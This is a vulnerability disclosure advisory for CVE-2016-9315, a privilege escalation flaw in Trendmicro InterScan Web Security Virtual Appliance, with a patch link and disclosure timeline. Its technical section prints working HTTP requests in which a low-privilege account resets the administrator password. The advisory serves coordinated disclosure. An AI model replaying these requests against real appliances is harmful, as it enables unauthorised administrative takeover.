Security Advisory

Trendmicro InterScan Privilege Escalation Vulnerability

CWE-267 Privilege Defined With Unsafe Actions

Advisory ID

KL-001-2017-002

CVE ID

CVE-2016-9315

Published

2017-02-15

Vendor

Trendmicro

Affected Systems

Product

InterScan Web Security Virtual Appliance

Version

OS Version 3.5.1321.el6.x86_64; Application

Platform

Embedded Linux

Discovered By

Matt Bergin (KoreLogic)

Download (signed .txt)

Back to Advisories

Vulnerability Details

Affected Vendor: Trendmicro

Affected Product: InterScan Web Security Virtual Appliance

Affected Version: OS Version 3.5.1321.el6.x86_64; Application

Platform: Embedded Linux

CWE Classification: CWE-267: Privilege Defined With Unsafe Actions

Impact: Privilege Escalation

Attack Vector: HTTP

CVE ID: CVE-2016-9315

Vulnerability Description

Any authenticated user can execute administrative functionality

Technical Description

POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logon.jsp
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:02:24 GMT
Connection: close

Use session identifier to run administrator functionality to change admin password.

POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 280

CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location: https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:37 GMT
Connection: close

POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M
Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

uid=admin&passwd=korelogic2

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:54 GMT
Connection: close

Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability in Version 6.5 CP 1737. Security advisory and link to the patched version available at:

https://success.trendmicro.com/solution/1116672

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Disclosure Timeline

2016-12-12

KoreLogic sends vulnerability report and PoC to Trendmicro.

2016-12-12

Trendmicro acknowledges receipt of report.

2017-01-11

Trendmicro informs KoreLogic that the patch to this and other KoreLogic reported issues will likely be available after the 45 business day deadline (2017.02.16).

2017-02-06

Trendmicro informs KoreLogic that the patched version will be available by 2017.02.14.

2017-02-14

Trendmicro security advisory released.

2017-02-15

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination

90+ day disclosure timeline

CVE coordination when applicable

Resources & Downloads

Contact Security Team

All Advisories Download signed .txt